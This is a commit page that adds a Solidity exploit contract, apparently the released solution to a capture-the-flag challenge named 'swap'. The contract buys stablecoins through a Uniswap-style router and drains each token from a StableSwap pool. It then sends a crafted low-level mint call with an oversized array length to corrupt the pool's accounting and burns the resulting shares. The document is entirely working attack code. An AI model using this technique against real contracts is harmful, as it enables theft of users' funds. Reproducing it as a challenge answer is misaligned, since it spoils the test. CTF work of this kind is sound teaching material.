release solution for swap

paradigmxyz · Apr 9, 2021 · fc40857 · fc40857
1 parent c84e730
commit fc40857
Showing 1 changed file with 89 additions and 0 deletions.
diff --git a/swap/private/Exploit.sol b/swap/private/Exploit.sol
@@ -0,0 +1,89 @@
+pragma solidity 0.4.24;
+
+import "public/Setup.sol";
+
+contract UniswapV2RouterLike1 {
+    function swapETHForExactTokens(uint amountOut, address[] memory path, address to, uint deadline)
+        public
+        payable
+        returns (uint[] memory amounts);
+}
+
+contract Exploit {
+    constructor(Setup setup) payable {
+        StableSwap swap = setup.swap();
+
+        UniswapV2RouterLike1 router = UniswapV2RouterLike1(0xf164fC0Ec4E93095b804a4795bBe1e041497b92a);
+
+        ERC20Like[4] memory tokens = [
+            ERC20Like(0x6B175474E89094C44Da98b954EedeAC495271d0F),
+            ERC20Like(0x0000000000085d4780B73119b644AE5ecd22b376),
+            ERC20Like(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48),
+            ERC20Like(0xdAC17F958D2ee523a2206206994597C13D831ec7)
+        ];
+
+        address[] memory path = new address[](2);
+
+        for (uint i = 1; i < tokens.length; i++) {
+            uint want = scaleTo(tokens[0], scaleFrom(tokens[i], tokens[i].balanceOf(address(swap)))) * 1000 / 997;
+
+            path[0] = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
+            path[1] = address(tokens[0]);
+
+            router.swapETHForExactTokens.value(address(this).balance)(want, path, address(this), uint(-1));
+            tokens[0].approve(address(swap), want);
+            swap.swap(tokens[0], want, tokens[i]);
+            tokens[i].transfer(msg.sender, tokens[i].balanceOf(address(this)));
+        }
+
+        {
+            path[0] = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
+            path[1] = address(tokens[0]);
+
+            router.swapETHForExactTokens.value(address(this).balance)(scaleTo(tokens[0], 10000 ether), path, address(this), uint(-1));
+        }
+
+        {
+            path[0] = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
+            path[1] = address(tokens[1]);
+
+            router.swapETHForExactTokens.value(address(this).balance)(1, path, address(this), uint(-1));
+        }
+
+        {
+            path[0] = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
+            path[1] = address(tokens[2]);
+
+            router.swapETHForExactTokens.value(address(this).balance)(scaleTo(tokens[2], 10000 ether), path, address(this), uint(-1));
+        }
+
+        for (i = 0; i < 4; i++) {            
+            tokens[i].approve(address(swap), uint(-1));
+        }
+
+        require(address(swap).call(abi.encodeWithSelector(swap.mint.selector, 0x20, 3618502788666131106986593281521497120414687020801267626233049500247285301248)), "oops");
+        swap.burn(swap.balanceOf(address(this)));
+    }
+
+    function scaleFrom(ERC20Like token, uint value) internal returns (uint) {
+        uint decimals = token.decimals();
+        if (decimals == 18) {
+            return value;
+        } else if (decimals < 18) {
+            return value * 10**(18-decimals);
+        } else {
+            return value * 10**18 / 10**decimals;
+        }
+    }
+
+    function scaleTo(ERC20Like token, uint value) internal returns (uint) {
+        uint decimals = token.decimals();
+        if (decimals == 18) {
+            return value;
+        } else if (decimals < 18) {
+            return value * 10**decimals / 10**18;
+        } else {
+            return value * 10**(decimals-18);
+        }
+    }
+}